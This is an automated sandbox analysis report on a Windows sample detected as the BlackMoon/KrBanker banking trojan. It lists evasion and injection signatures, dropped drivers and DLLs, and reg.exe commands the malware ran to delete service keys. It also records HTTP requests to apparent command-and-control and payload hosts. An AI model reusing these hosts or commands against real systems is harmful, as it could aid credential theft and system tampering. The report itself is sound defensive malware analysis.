Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:1.exe
Analysis ID:1488636
MD5:872012b4c2c1106679159d4c6fe1abcb
SHA1:f2ad8ccaa620fe0228a57280ce3813da33820bde
SHA256:3edda636a43d252e2edeef9441fe31383064e610b6111b6700854f2214565f33
Tags:exe
Infos:

Detection

BlackMoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected BlackMoon Ransomware
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject threads in other processes
Detected VMProtect packer
Found driver which could be used to inject code into processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the DNS server
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file has a writeable .text section
Sample is not signed and drops a device driver
Sample is protected by VMProtect
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Deletes Internet Explorer cookies via registry
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 1.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 872012B4C2C1106679159D4C6FE1ABCB)
    • DC1FFAF.exe (PID: 420 cmdline: "C:\Program Files (x86)\java\DC1FFAF.exe" WfCSiyl7KCmSe3x1d3x7eyiSWnspgSp9HpLfPHsme04= MD5: 0D79B45E55C20F14D9614596247B7DF2)
      • reg.exe (PID: 8136 cmdline: "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\2865ivSJ0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 6320 cmdline: "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BC66DPQaf /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5680 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
KrBanker, BlackMoonThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dllJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
    C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dllMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
    • 0xcd53c:$s1: blackmoon
    • 0xcd57c:$s2: BlackMoon RunTime Error:
    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dllJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
      C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dllMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
      • 0x470fc0:$s1: blackmoon
      • 0x471000:$s2: BlackMoon RunTime Error:

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.4716955883.0000000010412000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
        Process Memory Space: DC1FFAF.exe PID: 420JoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Modification of IE Registry Settings
          Source: Registry Key setAuthor: frack113: Data: Details: 3, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Java\DC1FFAF.exe, ProcessId: 420, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5680, ProcessName: svchost.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: 1.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dllAvira: detection malicious, Label: HEUR/AGEN.1328196
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dllAvira: detection malicious, Label: TR/Inject.zdewt
          Source: C:\Windows\SysWOW64\A16652yzz.sysAvira: detection malicious, Label: HEUR/AGEN.1360134
          Source: C:\Windows\DC1FFAF.sysAvira: detection malicious, Label: HEUR/AGEN.1360134
          Source: C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dllAvira: detection malicious, Label: HEUR/AGEN.1328190
          Source: C:\Windows\SysWOW64\2865ivSJ0.sysAvira: detection malicious, Label: HEUR/AGEN.1360134
          Source: C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dllAvira: detection malicious, Label: HEUR/AGEN.1328190
          Source: C:\Windows\SysWOW64\BC66DPQaf.sysAvira: detection malicious, Label: HEUR/AGEN.1360134
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dllReversingLabs: Detection: 66%
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dllReversingLabs: Detection: 66%
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\C5639556181\7488JGDAA.exeReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\1F0xyrmp.dllReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\42EEXUWWZ.dllReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dllReversingLabs: Detection: 61%
          Source: C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dllReversingLabs: Detection: 78%
          Source: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dllReversingLabs: Detection: 84%
          Source: C:\Users\user\Desktop\EEC3DA20E\E2416B28\38902yywx.dllReversingLabs: Detection: 54%
          Source: C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dllReversingLabs: Detection: 78%
          Source: C:\Windows\SysWOW64\A16652yzz.sysReversingLabs: Detection: 83%
          Multi AV Scanner detection for submitted file
          Source: 1.exeReversingLabs: Detection: 28%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\C5639556181\7488JGDAA.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dllJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dllJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dllJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\A16652yzz.sysJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeJoe Sandbox ML: detected
          Source: C:\Windows\DC1FFAF.sysJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dllJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\2865ivSJ0.sysJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dllJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\EEC3DA20E\E2416B28\38902yywx.dllJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dllJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\BC66DPQaf.sysJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: 1.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA41C0 CryptMsgGetParam,_printf,_printf,CertGetNameStringA,LocalAlloc,CertGetNameStringA,CertGetNameStringA,LocalFree,CertGetNameStringA,LocalAlloc,CertGetNameStringA,_strncpy,2_2_69EA41C0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA4360 CryptMsgGetParam,lstrcmpA,CryptDecodeObject,CryptDecodeObject,LocalAlloc,CryptDecodeObject,2_2_69EA4360
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA44F0 CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,_printf,CertFindCertificateInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,2_2_69EA44F0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA44D4 CryptMsgGetParam,LocalFree,2_2_69EA44D4
          Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: F:\funny\GamePluginCtrl\Release\gamePluginCtrl.pdb<F source: DC1FFAF.exe, 00000002.00000003.2402871996.00000000065FA000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmp, 586030GBC.dll.2.dr, 5B7DOONHA.dll.2.dr
          Source: Binary string: ginCtrl\Release\gamePluginCtrl.pdb source: DC1FFAF.exe, 00000002.00000003.2402987601.0000000006543000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \bin\xkSHWL.pdb source: DC1FFAF.exe, 00000002.00000002.4732870352.00000000112EE000.00000004.00000020.00020000.00000000.sdmp, DE3EC8324.dll.2.dr
          Source: Binary string: \bin\xkSHWL.pdb$ source: DC1FFAF.exe, 00000002.00000002.4732870352.00000000112EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \DPK.pdb source: DC1FFAF.exe, 00000002.00000002.4770861240.0000000013FCC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: DPK\bin\dlq.pdb source: DC1FFAF.exe, 00000002.00000002.4792617238.000000001451C000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2226812562.000000000651D000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2226175625.0000000006540000.00000004.00000020.00020000.00000000.sdmp, 38902yywx.dll.2.dr
          Source: Binary string: \GamePluginCtrl\Release\gamePluginCtrl.pdb source: DC1FFAF.exe, 00000002.00000002.4696431974.000000000FA82000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: F:\funny\GamePluginCtrl\Release\gamePluginCtrl.pdb source: DC1FFAF.exe, DC1FFAF.exe, 00000002.00000003.2201582484.000000000659B000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2402871996.00000000065FA000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmp, 586030GBC.dll.2.dr, 5B7DOONHA.dll.2.dr
          Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb @ source: DC1FFAF.exe, 00000002.00000003.2216343997.0000000006540000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2216394508.0000000006520000.00000004.00000020.00020000.00000000.sdmp, 17B0883wr.dll.2.dr, 51D610yws.dll.2.dr, 338Atwspn.dll.2.dr
          Source: Binary string: DPK\bin\DPK.pdb source: DC1FFAF.exe, 00000002.00000002.4749878169.00000000117A4000.00000004.00000020.00020000.00000000.sdmp, 42EEXUWWZ.dll.2.dr, 1F0xyrmp.dll.2.dr
          Source: Binary string: \GamePluginCtrl\Release\gamePluginCtrl.pdb<F source: DC1FFAF.exe, 00000002.00000002.4696431974.000000000FA82000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \bin\xkSHWL.pdbtc source: DE3EC8324.dll.2.dr
          Source: Binary string: DPK\bin\JDClient.pdb source: 7488JGDAA.exe.2.dr
          Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb source: DC1FFAF.exe, 00000002.00000002.4791297106.00000000144D8000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2216343997.0000000006540000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2216394508.0000000006520000.00000004.00000020.00020000.00000000.sdmp, 17B0883wr.dll.2.dr, 51D610yws.dll.2.dr, 338Atwspn.dll.2.dr
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EBC474 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_69EBC474
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_00468010 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,_strncpy,2_2_00468010
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_004684E0 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,FindClose,2_2_004684E0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_00443E10 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,_strncpy,FindNextFileA,2_2_00443E10
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
          Source: Joe Sandbox ViewIP Address: 104.192.110.226 104.192.110.226
          Source: Joe Sandbox ViewIP Address: 163.171.132.119 163.171.132.119
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vip.baxingfz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.baidu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.qq.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sina.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jd.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sogou.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.so.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: youdao.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.1688.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: soso.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.hao123.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.eastmoney.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jmw.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.cdstm.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: foodmate.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.tencent.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.hupu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.cctv.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2024-08-06/16_26 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: xianggangcs.oss-accelerate.aliyuncs.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jb51.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.autohome.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.zhihu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /operate/18771 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kss_admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNHost: yanzheng.appchizi.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kss_admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNHost: yanzheng.appchizi.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kss_admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNHost: yanzheng.appchizi.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kss_admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNHost: yanzheng.appchizi.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /kss_io/io.php?v=13&b=1&s=10000002&e=get&line=1kstoken80597805589 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Accept-Language: zh-cnReferer: http://yanzheng.appchizi.com/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; )Content-Length: 126Host: yanzheng.appchizi.com
          Source: global trafficHTTP traffic detected: GET /operate/11133 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.kuaishou.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sogou.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.douyin.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sohu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.qq.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sina.com.cnRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.baidu.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.so.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: soso.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.jd.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.1688.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: youdao.comRange: bytes=0-Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: foodmate.netRange: bytes=0-Connection: Keep-Alive
